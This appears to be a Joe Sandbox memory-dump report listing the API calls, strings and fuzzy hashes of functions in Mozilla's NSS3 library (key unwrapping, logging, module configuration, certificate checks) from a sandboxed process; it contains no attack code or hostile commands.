                                                                • Part of subcall function 6D1307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D130825
                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D0F7DF3
                                                              • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6D0F7F07
                                                              • PK11_GetPadMechanism.NSS3(00000000), ref: 6D0F7F57
                                                              • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6D0F7F98
                                                              • PK11_FreeSymKey.NSS3(?), ref: 6D0F7FC9
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0F7FDE
                                                              • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6D0F8000
                                                                • Part of subcall function 6D119430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6D0F7F0C,?,00000000,00000000,00000000,?), ref: 6D11943B
                                                                • Part of subcall function 6D119430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6D11946B
                                                                • Part of subcall function 6D119430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6D119546
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0F8110
                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6D0F811D
                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D0F822D
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D0F823C
                                                              Similarity
                                                              • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                              • String ID:
                                                              • API String ID: 1923011919-0
                                                              • Opcode ID: 4b7db0da5ead685a1d1b2bb400dbc3180fd20bfe0ae50b47333963d49dabcaa3
                                                              • Instruction ID: f69614a2c33ed9a8a78fa1115fcfa95520d0b5bcfdd8230dc80e7776dff73009
                                                              • Opcode Fuzzy Hash: 4b7db0da5ead685a1d1b2bb400dbc3180fd20bfe0ae50b47333963d49dabcaa3
                                                              • Instruction Fuzzy Hash: 4EC170B1D0421A9BEB61CF14CC40FEEB7B8BF19308F5181E5E918A6241E7719E86CF91
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C3F
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C60
                                                              • PR_ExplodeTime.NSS3(00000000,6D0D1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6D0D1C6F,00000000,00000004,?,?), ref: 6D126C94
                                                              Similarity
                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                              • API String ID: 3534712800-180463219
                                                              • Opcode ID: a87ea4403c5fa8a0d61c88fced95d13d804c0867a8cb31aa5e24adc0ee1dccd8
                                                              • Instruction ID: dde5da6a54dec18aba7bae236b62fca41f8573f865112a48a9e0d07686269863
                                                              • Opcode Fuzzy Hash: a87ea4403c5fa8a0d61c88fced95d13d804c0867a8cb31aa5e24adc0ee1dccd8
                                                              • Instruction Fuzzy Hash: 76515A72B016094FC708CDADDC527DEB7DAABA4310F48C23AE842DB785D679D902C751
                                                              APIs
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D13BD48
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D13BD68
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D13BD83
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D13BD9E
                                                              • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6D13BDB9
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6D13BDD0
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6D13BDEA
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6D13BE04
                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6D13BE1E
                                                              Similarity
                                                              • API ID: AlgorithmPolicy
                                                              • String ID:
                                                              • API String ID: 2721248240-0
                                                              • Opcode ID: 0eb410021889e04f80ad42f3d532b2a4d655f4164f5439cc9dfaa2b9a6466337
                                                              • Instruction ID: 6e59672f6ac9a8fe8936dfeaff08b158d986b930e6b6d1fd1c578999f4d453c0
                                                              • Opcode Fuzzy Hash: 0eb410021889e04f80ad42f3d532b2a4d655f4164f5439cc9dfaa2b9a6466337
                                                              • Instruction Fuzzy Hash: 6621F566E4467F57FB004A56DE43F6B32B49BA1769F070024FA1AEE149F3A09414C3A2
                                                              APIs
                                                              • PR_CallOnce.NSS3(6D2314E4,6D19CC70), ref: 6D1E8D47
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E8D98
                                                                • Part of subcall function 6D0C0F00: PR_GetPageSize.NSS3(6D0C0936,FFFFE8AE,?,6D0516B7,00000000,?,6D0C0936,00000000,?,6D05204A), ref: 6D0C0F1B
                                                                • Part of subcall function 6D0C0F00: PR_NewLogModule.NSS3(clock,6D0C0936,FFFFE8AE,?,6D0516B7,00000000,?,6D0C0936,00000000,?,6D05204A), ref: 6D0C0F25
                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D1E8E7B
                                                              • htons.WSOCK32(?), ref: 6D1E8EDB
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E8F99
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E910A
                                                              Similarity
                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                              • String ID: %u.%u.%u.%u
                                                              • API String ID: 1845059423-1542503432
                                                              • Opcode ID: b96c7d26fd446606c18f32aecf7fc8a858bf9751edc5b9fb8240602f5bc9da32
                                                              • Instruction ID: 15c6a945914a20c5cc7afebe64823ab9d844e5613b184a05dabded99d4772d5d
                                                              • Opcode Fuzzy Hash: b96c7d26fd446606c18f32aecf7fc8a858bf9751edc5b9fb8240602f5bc9da32
                                                              • Instruction Fuzzy Hash: 5C02B971A04A528FDB19CF18C47837ABBB3EF96390F0AC259D8919B2D9C3B1D945C790
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6D068637,?,?), ref: 6D1A9E88
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6D068637), ref: 6D1A9ED6
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D1A9ECF
                                                              • database corruption, xrefs: 6D1A9ECA
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D1A9EC0
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 912837312-598938438
                                                              • Opcode ID: 33892cf18c444b29c8daf2664cc7ccdf646581d203f8c3e4e335ed1987b92b0b
                                                              • Instruction ID: b6fa0e338e2416a1412bfd1b6185783c0fc1317646c674197c0bbd534204cf90
                                                              • Opcode Fuzzy Hash: 33892cf18c444b29c8daf2664cc7ccdf646581d203f8c3e4e335ed1987b92b0b
                                                              • Instruction Fuzzy Hash: 7E81E935B402168FDB04CF69C990AEEB7F6FF48314F498029E915AB246D7B1EE85CB50
                                                              APIs
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1ED086
                                                              • PR_Malloc.NSS3(00000001), ref: 6D1ED0B9
                                                              • PR_Free.NSS3(?), ref: 6D1ED138
                                                              Similarity
                                                              • API ID: FreeMallocstrlen
                                                              • String ID: >
                                                              • API String ID: 1782319670-325317158
                                                              • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                              • Instruction ID: 87c4b7a09977f375f4aa5be783fa46988b33614cab6f2ac858de0194afebe2d3
                                                              • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                              • Instruction Fuzzy Hash: 0DD128A2B50D470BEB1545788CA13EABB9397D23F0F584329D521CB3EDE5E988838341
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d357f2aa78b145225cef5ba00b96104e2e84201b908c24fc6b65ccff368a13cb
                                                              • Instruction ID: 6bb3ffdcdb42355dda6b064bcc694c3e74f256e6c6d9a597da489805faac80c7
                                                              • Opcode Fuzzy Hash: d357f2aa78b145225cef5ba00b96104e2e84201b908c24fc6b65ccff368a13cb
                                                              • Instruction Fuzzy Hash: D5F1D670E002568FEB15CF28C5487BB77F1BB9A308F054129E915E7359E7B49A52CF81
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e4d032a22b2a074d2f814c85c58025d5193db35947e71249d1a5cb93825cb04
                                                              • Instruction ID: 45f0effdfe4ae3513659a9f800252c9faf6c206d9e84429e8f3e33d04151bcca
                                                              • Opcode Fuzzy Hash: 7e4d032a22b2a074d2f814c85c58025d5193db35947e71249d1a5cb93825cb04
                                                              • Instruction Fuzzy Hash: 2411E7387043068FDB10DF29D88466677B1FF85364F1980ADD8198B34DDBB2E906CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                              • Instruction ID: ade1faed42fade384a53e182ef1398babd0bdb705831944ab968a5f8494dbb9b
                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                              • Instruction Fuzzy Hash: 74E06D3F200015A7DB148E0AC450AA9735AEF91655FA98079FC5DEBA09D673F8038781
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af874973f7f80435a29e5574182b52ccff852fd63598d5cfb47c0f4614c381d3
                                                              • Instruction ID: 6fd6575eff8c4220ef510d7ff3a24160e2ab2813925d4e88223853743c6d9f61
                                                              • Opcode Fuzzy Hash: af874973f7f80435a29e5574182b52ccff852fd63598d5cfb47c0f4614c381d3
                                                              • Instruction Fuzzy Hash: 53C04838244608CFC708DA08E589AA53BA8AB0D6107050094EA028B721DB22F800CA80
                                                              APIs
                                                              • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6D101D46), ref: 6D102345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print
                                                              • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                              APIs
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6D135E08
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135E3F
                                                              • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6D135E5C
                                                              • free.MOZGLUE(00000000), ref: 6D135E7E
                                                              • free.MOZGLUE(00000000), ref: 6D135E97
                                                              • PORT_Strdup_Util.NSS3(secmod.db), ref: 6D135EA5
                                                              • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6D135EBB
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135ECB
                                                              • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6D135EF0
                                                              • free.MOZGLUE(00000000), ref: 6D135F12
                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D135F35
                                                              • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6D135F5B
                                                              • free.MOZGLUE(00000000), ref: 6D135F82
                                                              • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6D135FA3
                                                              • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6D135FB7
                                                              • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D135FC4
                                                              • free.MOZGLUE(00000000), ref: 6D135FDB
                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D135FE9
                                                              • free.MOZGLUE(00000000), ref: 6D135FFE
                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D13600C
                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D136027
                                                              • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6D13605A
                                                              • PR_smprintf.NSS3(6D20AAF9,00000000), ref: 6D13606A
                                                              • free.MOZGLUE(00000000), ref: 6D13607C
                                                              • free.MOZGLUE(00000000), ref: 6D13609A
                                                              • free.MOZGLUE(00000000), ref: 6D1360B2
                                                              • free.MOZGLUE(?), ref: 6D1360CE
                                                              Strings
                                                              Similarity
                                                              • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                              • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                              APIs
                                                              • PR_NewLock.NSS3 ref: 6D0C1DA3
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6D0C1DB2
                                                                • Part of subcall function 6D0C1240: TlsGetValue.KERNEL32(00000040,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1267
                                                                • Part of subcall function 6D0C1240: EnterCriticalSection.KERNEL32(?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C127C
                                                                • Part of subcall function 6D0C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1291
                                                                • Part of subcall function 6D0C1240: PR_Unlock.NSS3(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C12A0
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0C1DD8
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6D0C1E4F
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6D0C1EA4
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6D0C1ECD
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6D0C1EEF
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6D0C1F17
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D0C1F34
                                                              • PR_SetLogBuffering.NSS3(00004000), ref: 6D0C1F61
                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6D0C1F6E
                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6D0C1F83
                                                              • PR_SetLogFile.NSS3(00000000), ref: 6D0C1FA2
                                                              • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6D0C1FB8
                                                              • OutputDebugStringA.KERNEL32(00000000), ref: 6D0C1FCB
                                                              • free.MOZGLUE(00000000), ref: 6D0C1FD2
                                                              Strings
                                                              Similarity
                                                              • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                              • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                              APIs
                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C50
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C5B
                                                              • PR_smprintf.NSS3(6D20AAF9,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C76
                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134CAE
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134CC9
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134CF4
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134D0B
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134D5E
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134D68
                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6D134D85
                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6D134DA2
                                                              • free.MOZGLUE(?), ref: 6D134DB9
                                                              • free.MOZGLUE(00000000), ref: 6D134DCF
                                                              Strings
                                                              Similarity
                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0DDDDE
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6D0DDDF5
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6D0DDE34
                                                              • PR_Now.NSS3 ref: 6D0DDE93
                                                              • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6D0DDE9D
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0DDEB4
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0DDEC3
                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D0DDED8
                                                              • PR_smprintf.NSS3(%s%s,?,?), ref: 6D0DDEF0
                                                              • PR_smprintf.NSS3(6D20AAF9,(NULL) (Validity Unknown)), ref: 6D0DDF04
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0DDF13
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0DDF22
                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6D0DDF33
                                                              • free.MOZGLUE(00000000), ref: 6D0DDF3C
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0DDF4B
                                                              • free.MOZGLUE(00000000), ref: 6D0DDF74
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D0DDF8E
                                                              Strings
                                                              Similarity
                                                              • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                              • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                              • API String ID: 1882561532-3437882492
                                                              • Opcode ID: cf4b2ada9949026464c8bd6283135faf4b1b5daa7429a9403282c67abacf7f29
                                                              • Instruction ID: f5730b3194b05d88e18858a8ccba22e1202f446a1b83255ed445f82b2e8cbeda
                                                              • Opcode Fuzzy Hash: cf4b2ada9949026464c8bd6283135faf4b1b5daa7429a9403282c67abacf7f29
                                                              • Instruction Fuzzy Hash: 1B518FB1D043169BEB509E669C41B7F7AF9AF85758F15402AE809EB205F731D900CBF2
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6D112DEC
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6D112E00
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D112E2B
                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D112E43
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6D0E4F1C,?,-00000001,00000000,?), ref: 6D112E74
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6D0E4F1C,?,-00000001,00000000), ref: 6D112E88
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EC6
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EE4
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EF8
                                                              • PR_Unlock.NSS3(?), ref: 6D112F62
                                                              • TlsGetValue.KERNEL32 ref: 6D112F86
                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6D112F9E
                                                              • PR_Unlock.NSS3(?), ref: 6D112FCA
                                                              • TlsGetValue.KERNEL32 ref: 6D11301A
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D11302E
                                                              • PR_Unlock.NSS3(?), ref: 6D113066
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D113085
                                                              • PR_Unlock.NSS3(?), ref: 6D1130EC
                                                              • TlsGetValue.KERNEL32 ref: 6D11310C
                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6D113124
                                                              • PR_Unlock.NSS3(?), ref: 6D11314C
                                                                • Part of subcall function 6D0F9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6D12379E,?,6D0F9568,00000000,?,6D12379E,?,00000001,?), ref: 6D0F918D
                                                                • Part of subcall function 6D0F9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6D12379E,?,6D0F9568,00000000,?,6D12379E,?,00000001,?), ref: 6D0F91A0
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
